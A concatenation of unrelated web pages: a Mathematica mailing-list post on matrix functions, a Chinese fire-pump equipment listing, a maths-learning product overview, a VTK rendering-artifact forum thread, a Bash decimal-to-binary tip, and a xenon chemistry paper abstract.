(eval^# &) /@ Range[1, Length[eval] - 1];\nPrependTo[y, x]\n]\n\nbut we also need the determinant of the Vandermonde matrix with one of\nthe columns replaced by {F[eval[]],F[eval[]],...}\n\nVandermondeMatrixReplaced[eval_List,f_, n_] := Module[{w, fs},\nw = VandermondeMatrix[eval]; (* or pull this call out for efficiency *)\nfs = Map[f, eval];\nReplacePart[w, fs, n]\n]\n\nCalculation of this deteminant was a problem which caused my recent messages to\nMathGroup. Rasmus Debitsch have suggested using the row echelon form\nof the matrix. For smaller matrices simple Det[] works.\n\nFinally we arrive at the HamiltonCailey[] function which computes any\nfunction of a square matrix:\n\nHamiltonCailey[A_, F_] := Module[{eig, n, w, wr, x},\n{eig, vars} = ReplaceEqual[Eigenvalues[A]];\nn = Dim[A]; (* dimension of the n x n matrix A *)\nw = VandermondeMatrix[eig];\nwr = (1/Det[w]) Sum[\nDet[VandermondeMatrixReplaced[eig, F, n - k + 1]]*\nMatrixPower[A, n - k], {k, 1, n}]\n]\n\nDo not forget to apply the Limit[] to the result. There is still a lot\nto be said about the above method, but you get the idea.\n\nFor the matrix in above example\nM={{1,1,1},{0,2,0},{1,1,1}}\nyou write\n\nLimit[HamiltonCailey[M,#^n&]//Simplify,i1->0]\n\n{{2^(-1+n),n 2^(-1+n),2^(-1+n)},\n{0,2^n,0},\n{2^(-1+n),n 2^(-1+n),2^(-1+n)}}\n\nKonstantin.\n\nPS. I wish to thank Rasmus Debitsch and all who responded to my post.\n\n```\n\n• Prev by Date: Re: Creating graph with only a few data points\n• Next by Date: Request for contour plotting algorithm\n• Previous by thread: Re: Creating graph with only a few data points\n• Next by thread: Re: MatrixPower[]" ]
[ null, "http://forums.wolfram.com/mathgroup/images/head_mathgroup.gif", null, "http://forums.wolfram.com/mathgroup/images/head_archive.gif", null, "http://forums.wolfram.com/mathgroup/images/numbers/2.gif", null, "http://forums.wolfram.com/mathgroup/images/numbers/0.gif", null, "http://forums.wolfram.com/mathgroup/images/numbers/0.gif", null, "http://forums.wolfram.com/mathgroup/images/numbers/1.gif", null, "http://forums.wolfram.com/mathgroup/images/search_archive.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6977725,"math_prob":0.998604,"size":4108,"snap":"2019-26-2019-30","text_gpt3_token_len":1275,"char_repetition_ratio":0.12207603,"word_repetition_ratio":0.0,"special_character_ratio":0.33057448,"punctuation_ratio":0.2054054,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9992662,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-06-16T11:55:36Z\",\"WARC-Record-ID\":\"<urn:uuid:46e2e775-75db-40a7-8444-47577213d747>\",\"Content-Length\":\"45409\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b94f617d-a575-4e8f-8701-66446ae41d73>\",\"WARC-Concurrent-To\":\"<urn:uuid:a33ec16b-7830-4d85-9d34-1d442d5ec1bb>\",\"WARC-IP-Address\":\"140.177.205.73\",\"WARC-Target-URI\":\"http://forums.wolfram.com/mathgroup/archive/2001/May/msg00327.html\",\"WARC-Payload-Digest\":\"sha1:6O735JM4WELB2TKROOKSPYYD7MSCHRHS\",\"WARC-Block-Digest\":\"sha1:5UZ36RHIUCRPH3EHCYSTH3XAHPD52ICS\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-26/CC-MAIN-2019-26_segments_1560627998100.52_warc_CC-MAIN-20190616102719-20190616124719-00536.warc.gz\"}"}
http://www.xzqpv.com/products/2034.html
[ "### 立即咨询", null, "### 产品展示", null, "", null, "", null, "• 上海喜之泉下置式XZQ消防稳压给水设备,立式增压稳压设备,消防泵供水设备,消防泵\n• 额定容量: 10-1000(L)\n额定输出功率: 1.5(kw)\n电压: 380(V)\n• 点击:401\n\n消防自动增压稳压给水成套设备是为消防灭火工程配套的设备,主要作用:保持水灭火管网的消防压力,发生火警打开水灭火设备能立即喷出充实水柱,给报警联动启动大消防泵赢得30秒以上的初期灭火扑救时间,直至消防主泵全负荷启动进行,由于该设备能始终保持管网压力,使管网不存空气启动大消防泵不打呛管网无颤动危险。并获得消防产品3CF认证证书。", null, "", null, "", null, "", null, "1、泵、电控柜、隔膜式气压罐、组合管网四位一体,并配带有隔振器,无需预埋地脚孔,设计人员只需算好参数即可查得设备型号、基础尺寸等。电气设计人员无需再进行控制线路设计,只设计泵房内进线和到设备的走线。选用方便,可大大缩短设计人员的设计周期和施工人员的施工时间。\n\n2、隔膜式气压罐一次性充气持久耐用,水气隔离能预防水质的污染。\n\n3、设备占地面积小,投资省,全自动运行,无需专人看管。\n\n4、设备有双电源接口,双路电源自动(手动)切换,设备可根据设计要求制作。\n\n5、具有自动保护及故障切换功能。任何一台水泵发生故障(电气故障或水力故障)均能启动备用泵。\n6、可与消防中心连接(根据设计需要)。\n7、可以根据客户的需要选择罐、稳压方式、控制功能。\n8、电气主要元气件采用国产或企业产品,质量可靠、运行稳定\n\nZW(L、W)本设备根据建设部标准图集98S205基础的性能参数做为参考,推出了两种设备型号,①ZW(L)、ZW(W)系列稳压按照建设部图集98S205图集号所设计的型号;②企业根据消防GA30-92、GA30-2002相关标准及给水设备标准规范编制的设备型号。在这里删除了稳压罐、水泵的垄断性型号,给设计及用户一个产品选择的竞争空间。本公司唐纯虎为您推荐以下型号产品使用,如:LG、GDL、CDL、ISG等型号。用户可以根据水位水箱间的位置选择合适的设备。\n\n该设备由稳压泵两台(根据设计要求可设一台)为一用一备,隔膜式稳压罐一台,电控柜一台,仪表阀门及组合管网各一套,组成了隔膜式稳压供水设备。\n\n1、工业、民用建筑的消防、喷淋和稳压给水;\n2、暖通、空调、锅炉的定压补水;\n3、隐蔽工程、临时建筑和小型工矿,偏远地区的生活给水\n\n隔膜式气压给水设备,一次充气,常年运行使用。工作时起动补水泵,水室进水,水压升高,气室的气体被压缩隔膜伸长;当水压下降时,气室气体膨胀,隔膜收缩,压迫水室出水。这样周而复始,通过电接点压力表和电控箱控制水泵运行,达到额定的压力和连续供水。\n\n 序号 增压稳压设备型号 消防压力(Mpa)P1 立式隔膜式气压罐 配用水泵 运行压力 (Mpa) 稳压水容积(L) 型号规格 工作压力比αb 消防储水容积(L) 型 号 标定容积 实际容积 1 ZW(L)-1-X-7 0.10 XQG800×0.6 0.60 300 319 25LG3-10×4 N=1.5kw P1=0.10 PS1=0.26 P1=0.23 PS2=0.31 54 2 ZW(L)-1-Z-10 0.16 XQG800×0.6 0.80 150 159 25LG3-10×4 N=1.5kw P1=0.16 PS1=0.26 P1=0.23 PS2=0.36 70 3 ZW(L)-1-X-10 0.16 XQG800×0.6 0.60 300 319 25LG3-10×5 N=1.5kw P1=0.16 PS1=0.36 P1=0.33 PS2=0.42 52 4 ZW(L)-1-X-13 0.22 XQG1000×0.6 0.76 300 329 25LG3-10×4 N=1.5kw P1=0.22 PS1=0.35 P1=0.32 PS2=0.40 97 5 ZW(L)-1-XZ-10 0.16 XQG1000×0.6 0.65 450 480 25LG3-10×4 N=1.5kw P1=0.16 PS1=0.33 P1=0.30 PS2=0.38 86 6 ZW(L)-Ⅰ-XZ-13 0.22 XQG1000×0.6 0.67 450 452 25LG3-10×5 N=1.5kw P1=0.22 PS1=0.41 P1=0.38 PS2=0.46 80 7 ZW(L)-Ⅱ-Z- A 0.22 -0.38 XQG800×0.6 0.80 150 159 25LG3-10×6 N=2.2kw P1=0.38 PS1=0.53 P1=0.50 PS2=0.60 61 8 B 0.38 -0.50 XQG800×1.0 0.80 150 159 25LG3-10×8 N=2.2kw P1=0.50 PS1=0.68 P1=0.65 PS2=0.75 51 9 C 0.50 -0.65 XQG1000×1.0 0.85 150 206 25LG3-10×9 N=2.2kw P1=0.65 PS1=0.81 P1=0.78 PS2=0.86 59 10 D 0.65 -0.85 XQG1000×1.6 0.85 150 206 25LG3-10×11 N=3.0kw P1=0.85 PS1=1.04 P1=1.02 PS2=1.10 57 11 E 0.85 -1.0 XQG1000×1.6 0.85 150 206 25LG3-10×13 N=4.0kw P1=1.00 PS1=1.21 P1=1.19 PS2=1.27 50 12 ZW(L)-Ⅱ-X- A 0.22-0.38 XQG800×0.6 0.78 300 302 25LG3-10×6 N=2.2kw P1=0.38 PS1=0.53 P1=0.50 PS2=0.60 72 13 B 0.38-0.50 XQG800×1.0 0.78 300 302 25LGW3-10×8 N=2.2kw P1=0.50 PS1=0.68 P1=0.65 PS2=0.75 61 14 C 0.50-0.65 XQG1000×1.0 0.78 300 302 25LG3-10×10 N=3.0kw P1=0.65 PS1=0.88 P1=0.86 PS2=0.93 51 15 D 0.65-0.85 XQG1200×1.6 0.85 300 355 25LG3-10×13 N=4.0kw P1=0.85 PS1=1.05 P1=1.02 PS2=1.10 82 16 E 0.85-1.0 XQG1200×1.6 0.85 300 355 25LG3-10×15 N=4.0kw P1=1.00 PS1=1.21 P1=1.19 PS2=1.26 73 17 ZW(L)-Ⅱ-XZ- A 0.22-0.38 XQG1200×0.6 0.80 450 474 25LG3-10×6 N=2.2kw P1=0.38 PS1=0.53 P1=0.50 PS2=0.60 133 18 B 0.38-0.50 XQG1200×1.0 0.80 450 474 25LG3-10×8 N=2.2kw P1=0.50 PS1=0.68 P1=0.65 PS2=0.75 110 19 C 0.50-0.65 XQG1200×1.0 0.80 450 474 25LG3-10×10 N=3.0kw P1=0.65 PS1=0.81 P1=0.78 PS2=0.86 90 20 D 0.65-0.85 XQG1200×1.6 0.80 450 474 25LG3-10×12 N=4.0kw P1=0.85 PS1=1.04 P1=1.02 PS2=1.10 73 21 E 0.85-1.0 XQG1200×1.6 0.80 450 474 25LG3-10×14 N=4.0kw P1=1.00 PS1=1.21 P1=1.19 PS2=1.27 64\n\n### 购买/咨询\n\n * 联系人: 请填写您的真实姓名 * 手机号码: 请填写您的真实手机 E-mail: 联系地址: 其他说明: 类型: 咨询 购买 * 验证码:", null, "看不清?\n\n### 评论信息\n\n##### 发表评论\n 姓名: 内容: 验证码:", null, "看不清? 1.尊重网上道德,遵守中华人民共和国的各项有关法律法规,不发表攻击性言论。 2.承担一切因您的行为而直接或间接导致的民事或刑事法律责任。 3.产品留言板管理人员有权保留或删除其管辖留言中的任意内容。 4.不支持HTML代码且留言要通过审核后才会显示,请勿恶意留言。\n//" ]
[ null, "http://www.xzqpv.com/App/Tpl/Public/Images/close.png", null, "http://www.xzqpv.com/Public/Uploads/Products/20190511/5cd66d9fb9756.jpg", null, "http://www.xzqpv.com/App/Tpl/Public/Images/jqs-left.gif", null, "http://www.xzqpv.com/App/Tpl/Public/Images/jqs-right.gif", null, "http://www.xzqpv.com/Public/Uploads/image/20170804/5983e0c319c58.jpg", null, "http://www.xzqpv.com/Public/Uploads/image/20190511/5cd66e192746d.jpg", null, "http://www.xzqpv.com/Public/Uploads/image/20190511/5cd66e212ebf3.jpg", null, "http://www.xzqpv.com/Public/Uploads/image/20190511/5cd66e279ebc9.jpg", null, "http://www.xzqpv.com/products/verify/", null, "http://www.xzqpv.com/public/verify.html", null ]
{"ft_lang_label":"__label__zh","ft_lang_prob":0.9402896,"math_prob":0.99261373,"size":1108,"snap":"2019-51-2020-05","text_gpt3_token_len":1244,"char_repetition_ratio":0.02807971,"word_repetition_ratio":0.0,"special_character_ratio":0.18140794,"punctuation_ratio":0.053030305,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9774014,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20],"im_url_duplicate_count":[null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-12-12T12:02:15Z\",\"WARC-Record-ID\":\"<urn:uuid:3895d1ae-e1e5-4b35-86d9-855f4e82205c>\",\"Content-Length\":\"69020\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:1cf60b73-84e2-44d4-b8e8-2448692ce1ba>\",\"WARC-Concurrent-To\":\"<urn:uuid:4473b4d9-e69e-40d9-9801-4ac20d72bc1b>\",\"WARC-IP-Address\":\"124.172.155.122\",\"WARC-Target-URI\":\"http://www.xzqpv.com/products/2034.html\",\"WARC-Payload-Digest\":\"sha1:JLS5XMXDADLVUGP4X3OJWY3CRQ27SUBF\",\"WARC-Block-Digest\":\"sha1:E2M65LT4AV2OTXLXYOULLMS3TNQGEPJJ\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-51/CC-MAIN-2019-51_segments_1575540543252.46_warc_CC-MAIN-20191212102302-20191212130302-00334.warc.gz\"}"}
https://bettermarks.com/how-it-works/
[ "# How it works\n\n## Feedback with every mistake\n\nThere are no dead ends with bettermarks. Right from the start, every learning type can find an exercise to fit. Start off with guided exercises, then work step by step through series and topics that get progressively more difficult. The student is never simply left alone – diverse forms of help are just a click away, before, during and after any particular question. If the student still has problems in an area, bettermarks automatically recommends exercises to close the knowledge gaps it identifies. This gives every student the opportunity to learn at their own pace.\n\n## Built for teachers\n\nOur goal is to facilitate the learning and teaching of mathematics. To reach this goal, bettermarks employs teachers, mathematicians, academic educationalists and software specialists to work together. Our adaptive math books guide students through exercises step by step with constructive feedback. As a teacher, you receive comprehensive reports on all your students‘ activity.", null, "### Teach\n\nIntroduce the topic in the lesson as you usually would.\n\n### Assign\n\nGive bettermarks exercises to your students.\n\n### Work\n\nThe students work through the exercises.\n\n### Evaluate\n\nGet the results with the click of a button.\n\nRepeat material or move on.\n\n# Topics for grades 4 to 10\n\nFractions\n• Basics of Fractions\n• Preparation for Calculating with Fractions\n• Addition and Subtraction of Fractions\n• Multiplication and Division of Fractions\n• Rules of Operation: Fractions\nData and Probability\n• Collecting, Representing and Analysing Data\n• Probability – Basics\n• Descriptive Statistics\nDecimal numbers\n• Decimal Numbers – Basics\n• Decimal Numbers – Further\n• Addition and Subtraction of Decimal Numbers\n• Multiplication and Division of Decimal Numbers\n• Mensuration\n• Written Addition and Subtraction of Decimal Numbers\n• Long Multiplication and Division of Decimal Numbers\n• Application of Decimal Numbers\nFunctions and their Representations\n• Functions – Basics\n• Linear Functions\n• Rational Functions\n• Linear and Exponential Growth\n• Exponential Functions\n• Logarithms\n• Power Functions\nGeometry\n• Maps, Scale, Symmetry, Key Terms on Geometry\n• Angles, Basic Constructions and Symmetry\n• Triangles\n• Rectangles, Squares and Composite Shapes\n• Cuboids, Cubes and Composite Solids\n• Circles\n• Prisms and Cylinders\n• Pyramids, Cones, Composite and Hollow Solids\n• Spheres\n• Enlargement and Reduction, Similarity\n• Intercept Theorems\n• Pythagoras‘ Theorem\nDecimal numbers\n• Converting, Comparing, Ordering and Calculating Currency\n• Converting, Comparing, Ordering and Calculating Length\n• Converting, Comparing, Ordering and Calculating Weight\n• Converting, Comparing, Ordering and Calculating Time\n• Word Problems on Currency, Length, Weight and Time\nLinear Equations and Inequalities\n• Setting up, Solving and Applying Linear Equations\n• Identifying, Solving and Applying Inequalities\n• Introduction to Systems of Linear Equations\nNatural Numbers\n• Introduction to Natural Numbers and Calculations\n• Representing Numbers up to 10 000\n• Comparing and Arranging Numbers up to 10 000\n• Addition and Subtraction up to 10 000\n• Representing Numbers up to 1 000 000\n• Comparing, Arranging and Rounding Numbers up to 1 000 000\n• Addition and Subtraction up to 1 000 000\n• Mental Multiplication and Division of Large Numbers\n• Large Numbers, Rounding and Estimation\n• Adding and Subtracting Natural Numbers\n• Multiplying and Dividing Natural Numbers\n• Order of Operations\n• Written Methods of Addition, Subtraction, Multiplication and Division\n• Square Numbers and Powers\nDivisibility and Prime Numbers\n• Divisibility Rules\n• Prime Numbers and Prime Factorisation\n• Sets of Factors and Multiples, HCF, LCM, Brain-Teasers\nTrigonometry\n• Calculations on Right-Angled Triangles\n• Calculations on General Triangles\n• Trigonometric functions and their graphs\nExpressions and Powers\n• Setting up and Evaluating Algebraic Expressions and Using Tables of Values\n• Calculating with Terms and Simplifying Expressions\n• Calculating with Terms and Powers\n• Powers with Natural Exponents\n• Powers with Integer Exponents\n• Powers with Rational Exponents\nProportion, Percentages and Interest\n• Direct Proportion and Inverse Proportion\n• Percentages and Interest Using the Rule of Three and Formulas", null, "bettermarks is an adaptive learning system for maths covering grades 4 to 10 (age 10 to 16)." ]
[ null, "https://bettermarks.com/wp-content/uploads/2019/05/howitworks.png", null, "https://bettermarks.com/wp-content/uploads/2019/05/bettermarks-logo.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9528302,"math_prob":0.8820297,"size":953,"snap":"2019-51-2020-05","text_gpt3_token_len":173,"char_repetition_ratio":0.10748156,"word_repetition_ratio":0.0,"special_character_ratio":0.17628542,"punctuation_ratio":0.11445783,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9940019,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,5,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-12-09T01:57:35Z\",\"WARC-Record-ID\":\"<urn:uuid:c1493328-3cad-4e33-b3b1-b966bf7d3bbd>\",\"Content-Length\":\"35076\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:678f0866-288d-4af4-a1eb-e26734bfd020>\",\"WARC-Concurrent-To\":\"<urn:uuid:f0784333-925d-46e7-bd63-0ca537cd8594>\",\"WARC-IP-Address\":\"159.69.52.46\",\"WARC-Target-URI\":\"https://bettermarks.com/how-it-works/\",\"WARC-Payload-Digest\":\"sha1:EU45YXSIFK65UYNEELBVTT7HIHH7Z3NV\",\"WARC-Block-Digest\":\"sha1:3QXGWYG3EEF2OX6QU2JDHSZPTBRPE7CY\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-51/CC-MAIN-2019-51_segments_1575540517156.63_warc_CC-MAIN-20191209013904-20191209041904-00156.warc.gz\"}"}
https://discourse.vtk.org/t/surface-rendering-artifacts/8875
[ "# surface rendering artifacts\n\nI am working on transitioning legacy VTK code (5.6) to 9.1+ and am encountering rendering\nartifacts when visualizing a triangulated, mostly flat, 3D surface. The artifact does not occur with\nour legacy code but does with builds against VTK tags v9.1.0 and v9.2.0.rc1.\nA very basic pipeline with mostly defaults (ie., lighting etc.) but with customize camera parameters\nproduces the artifact shown below. C++ code is provided. Any suggestions on mitigating or eliminating\nthis artifact ?\n\nA close up view of a corner of the planar surface:\n\nOverview of the planar surface in wireframe:\n\nSource:\n\n``````// plane_artifact_vtk.cpp : A demonstration of polydata rendering artifact not present\n// in vtk 5.6 (post introduction of shader support in vtk)\n//\n\n#include <vtkActor.h>\n#include <vtkCamera.h>\n#include <vtkNew.h>\n#include <vtkPolyDataMapper.h>\n#include <vtkProperty.h>\n#include <vtkRenderWindow.h>\n#include <vtkRenderer.h>\n#include <vtkRenderWindowInteractor.h>\n#include <vtkInteractorStyleTrackballCamera.h>\n\nusing namespace std;\n\nint main(int argc, char* argv[])\n{\nif (2 != argc)\n{\nstd::cout << \"Usage: plane_artifact_vtk <filename.vtp>\" << std::endl;\nreturn EXIT_SUCCESS;\n}\nstd::string filename(argv);\n\nvtkNew<vtkRenderer> renderer;\nvtkNew<vtkCamera> camera;\n\nrenderer->SetActiveCamera(camera);\nrenderer->SetBackground(1, 1, 1);\n\nvtkNew<vtkRenderWindow> renderWindow;\nrenderWindow->SetSize(800, 800);\nrenderWindow->SetWindowName(\"Plane Artifact VTK\");\n\nvtkNew<vtkRenderWindowInteractor> interactor;\ninteractor->SetRenderWindow(renderWindow);\n\nvtkNew<vtkInteractorStyleTrackballCamera> style;\ninteractor->SetInteractorStyle(style);\n\nvtkNew<vtkPolyDataMapper> mapper;\n\nvtkNew<vtkActor> actor;\nactor->SetMapper(mapper);\n\ndouble m_fAzimuth = 535;\ndouble m_fDip = 271;\nbool m_bParallelProjection = true;\n\ndouble m_fEast_Offset = -2076927.0490000001;\ndouble m_fNorth_Offset = -14599585.767999999;\ndouble m_fDepth_Offset = -6113.5580000000000;\ndouble m_fDistance = 40003208.092430003;\ndouble m_fZoomFactor = 6499379.5999999996;\nint m_nZCoordScale = 1;\n\n// set view up and direction of projection based on document settings\ndouble fAzim = m_fAzimuth / 720.0 * vtkMath::Pi();\ndouble fDip = m_fDip / 720.0 * vtkMath::Pi();\ndouble viewUp;\n\nviewUp = cos(fDip);\nviewUp = sin(fDip) * sin(fAzim);\nviewUp = sin(fDip) * cos(fAzim);\n\ndouble focalPoint;\n// set focal point according to offsets\nfocalPoint = -m_fEast_Offset;;\nfocalPoint = -m_fNorth_Offset;\nfocalPoint = m_fDepth_Offset * m_nZCoordScale;\n\ndouble directionOfProjection;\ndirectionOfProjection = -sin(fDip);\ndirectionOfProjection = cos(fDip) * sin(fAzim);\ndirectionOfProjection = cos(fDip) * cos(fAzim);\n\ndouble position;\nposition = focalPoint - directionOfProjection * m_fDistance;\nposition = focalPoint - directionOfProjection * m_fDistance;\nposition = focalPoint - directionOfProjection * m_fDistance;\n\ndouble viewAngle = 180.0 / vtkMath::Pi() * 0.1 * 6400.0 / m_fZoomFactor;\ndouble m_fParallelScale = 325 * m_fDistance / m_fZoomFactor;\n\nstd::cout << \"parallel scale: \" << m_fParallelScale << std::endl;\nstd::cout << \" distance: \" << m_fDistance << std::endl;\nstd::cout << \" zoom factor: \" << m_fZoomFactor << std::endl;\nstd::cout << \" east offset: \" << m_fEast_Offset << std::endl;\nstd::cout << \" north offset: \" << m_fNorth_Offset << std::endl;\nstd::cout << \" depth offset: \" << m_fDepth_Offset << std::endl;\nstd::cout << \" azimuth: \" << m_fAzimuth << std::endl;\nstd::cout << \" dip: \" << m_fDip << std::endl;\n\ncamera->SetViewUp(viewUp);\ncamera->SetPosition(position);\ncamera->SetFocalPoint(focalPoint);\ncamera->SetViewAngle(viewAngle);\ncamera->SetParallelProjection(m_bParallelProjection);\ncamera->SetParallelScale(m_fParallelScale);\ncamera->SetClippingRange(m_fDistance / 5, m_fDistance * 5);\n\ninteractor->Start();\n\nreturn EXIT_SUCCESS;\n}\n\n``````\n\nI discovered by inserting vtkPolyDataNormals between reader and mapper the artifact is eliminated.\nAnother solution is to force the renderer to call ResetCamera() (eg., ‘r’ or 'R\" key press) which\nadjusts/resets the camera clipping range and parallel scale based on visible prop bounds. If\nanyone has some insight as to why the artifact occurs post vtk 5.6 please comment.\n\nhave you tried with `.GetProperty().SetInterpolationToFlat()`\n\nHi Marco,\n\nif I set the actor interpolation to flat, then my fix with poly data normals\nno longer works … so does not resolve the issue. So far, the only fix that works directly\nis polydata normals and indirectly regardless of interpolation mode is forcing reset camera clipping range." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.54079956,"math_prob":0.7886462,"size":4072,"snap":"2022-27-2022-33","text_gpt3_token_len":1165,"char_repetition_ratio":0.13372664,"word_repetition_ratio":0.020361992,"special_character_ratio":0.29420432,"punctuation_ratio":0.26717559,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9506546,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-08-09T13:03:15Z\",\"WARC-Record-ID\":\"<urn:uuid:83e48abb-6308-4f6b-b7ea-6bbddfe4d0af>\",\"Content-Length\":\"26787\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:cf83c065-b66c-4754-bc88-7cec809fc3cf>\",\"WARC-Concurrent-To\":\"<urn:uuid:289eaa59-3603-462b-9ba7-66dfe7182e84>\",\"WARC-IP-Address\":\"50.58.123.179\",\"WARC-Target-URI\":\"https://discourse.vtk.org/t/surface-rendering-artifacts/8875\",\"WARC-Payload-Digest\":\"sha1:4HIZFB2ZYS5TJDVR4A3FSPOPOOZ6KM5L\",\"WARC-Block-Digest\":\"sha1:KEAK7GLEBDVYTGUB7ONPLBW2IIV67OKD\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-33/CC-MAIN-2022-33_segments_1659882570977.50_warc_CC-MAIN-20220809124724-20220809154724-00297.warc.gz\"}"}
https://en.quoll.it/faq/convert-a-decimal-number-to-binary-from-bash/
[ "# Convert a decimal number to binary from Bash\n\nSuppose we are working on a bash script and that for some need, not too difficult from reality, it is essential to have to convert a number or a decimal variable into a binary number.\n\nThere are of course several solutions but the one I propose does not make use of external programs but it is bash in all respects.\n\nFirst we need to know the maximum value of the binary number to be obtained in Bash or in how many bits it can be included.\n\nWe consider that we are talking about a byte and therefore 8 bits and that its binary range will go from 00000000 to 11111111 (from 0 to 255) then we can write:\n\n``````bin=({0..1}{0..1}{0..1}{0..1}{0..1}{0..1}{0..1}{0..1})\necho \\${bin[*]}``````\n\nThe more is done, in fact, to have the result for example of the number 125 or 78 in binary is enough\n\n``````echo \\${bin}\n01111101\necho \\${bin}\n01001110``````\n\nIf the range of the binary number changes, for example if we double or quadruple it is enough that we define the bin variable with one or two more blocks of the type {0..1}.\n\nSo summing up, the bin variable will have to contain as many blocks {0..1} based on the maximum binary number to be obtained, that is, if the maximum number is 2n -1 then it will take n groups {0..1}.\n\nAs an example if n=10 and therefore 210 -1=1023 the blocks will be 10\n\n``````bin=({0..1}{0..1}{0..1}{0..1}{0..1}{0..1}{0..1}{0..1}{0..1}{0..1})\necho \\${bin}\n1111111111``````" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.91591734,"math_prob":0.99339575,"size":1363,"snap":"2023-40-2023-50","text_gpt3_token_len":394,"char_repetition_ratio":0.17880794,"word_repetition_ratio":0.0,"special_character_ratio":0.35730007,"punctuation_ratio":0.16470589,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99298066,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-10-02T15:48:21Z\",\"WARC-Record-ID\":\"<urn:uuid:4e9c16f3-8cbd-463c-aabc-50fec596a340>\",\"Content-Length\":\"152307\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f9002bc4-0e42-4eab-b4d1-6877bb0e8eb6>\",\"WARC-Concurrent-To\":\"<urn:uuid:4b837024-02a3-41f1-bc81-b6a6818769ec>\",\"WARC-IP-Address\":\"16.171.100.43\",\"WARC-Target-URI\":\"https://en.quoll.it/faq/convert-a-decimal-number-to-binary-from-bash/\",\"WARC-Payload-Digest\":\"sha1:5HV6EX2BJ3KWBZVUQG2F3JF4SNTAMGQY\",\"WARC-Block-Digest\":\"sha1:FO7AXGRJA3TW3LUSTJIMAL372DIDSAU5\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233511000.99_warc_CC-MAIN-20231002132844-20231002162844-00323.warc.gz\"}"}
https://experts.mcmaster.ca/display/publication1476586
[ "# Synthesis, Structural Characterization, and Computational Study of the Strong Oxidant Salt [XeOTeF5][Sb(OTeF5)6]·SO2ClF† Conference Paper", null, "•\n• Overview\n•\n• Research\n•\n• Identity\n•\n• Additional Document Info\n•\n• View All\n•\n\n### abstract\n\n• The strong oxidant salt [XeOTeF(5)][Sb(OTeF(5))(6)].SO(2)ClF has been synthesized by reaction of stoichiometric amounts of Xe(OTeF(5))(2) and Sb(OTeF(5))(3) in SO(2)ClF solution at -78 degrees C and characterized in SO(2)ClF solution by low-temperature (17)O, (19)F, (121)Sb, (125)Te, and (129)Xe NMR spectroscopy, showing the Xe...O donor-acceptor bond XeOTeF(5)(+).SO(2)ClF adduct-cation to be labile at temperatures as low as -80 degrees C. The salt crystallizes from SO(2)ClF as [XeOTeF(5)][Sb(OTeF(5))(6)].SO(2)ClF, and the low-temperature crystal structure was obtained: triclinic, P, a = 9.7665(5) A, b = 9.9799(4) A, c = 18.5088(7) A, alpha = 89.293(2) degrees , beta = 82.726(2) degrees , gamma = 87.433(3) degrees , V = 1787.67(13) A(3), Z = 2, and R(1) = 0.0.0451 at -173 degrees C. Unlike MF(6)(-) in [XeF][MF(6)] (e.g., M = As, Sb, Bi) and [XeOTeF(5)][AsF(6)], the Sb(OTeF(5))(6)(-) anion is significantly less basic and does not interact with the coordinately unsaturated xenon(II) cation. Rather, the XeOTeF(5)(+) cation and weak Lewis base, SO(2)ClF, interact by coordination of an oxygen atom of SO(2)ClF to xenon [Xe...O, 2.471(5) A]. The XeOTeF(5)(+).SO(2)ClF adduct-cation has also been studied by low-temperature Raman spectroscopy, providing frequencies that have been assigned to adducted SO(2)ClF. The solid-state Raman spectra of XeOTeF(5)(+).SO(2)ClF and Sb(OTeF(5))(6)(-) have been assigned with the aid of electronic structure calculations. In addition to optimized geometries and vibrational frequencies, theoretical data, including gas-phase donor-acceptor bond energies, natural bond orbital (NBO) analyses, and topological analyses based on electron localization functions (ELF), provide descriptions of the bonding in XeOTeF(5)(+).SO(2)ClF and related systems. The quantum mechanical calculations provided consistent trends for the relative strengths of the Xe...O donor-acceptor bond in XeOTeF(5)(+).SO(2)ClF and ion-pair bonds in [XeL][MF(6)] (L = F, OTeF(5); M = As, Sb), with the Xe...O bond of XeOTeF(5)(+).SO(2)ClF being the weakest in the series.\n\n### authors\n\n• Mercier, Hélène PA\n• Moran, Matthew D\n• Sanders, Jeremy CP\n• Schrobilgen, Gary\n• Suontamo, RJ\n\n• 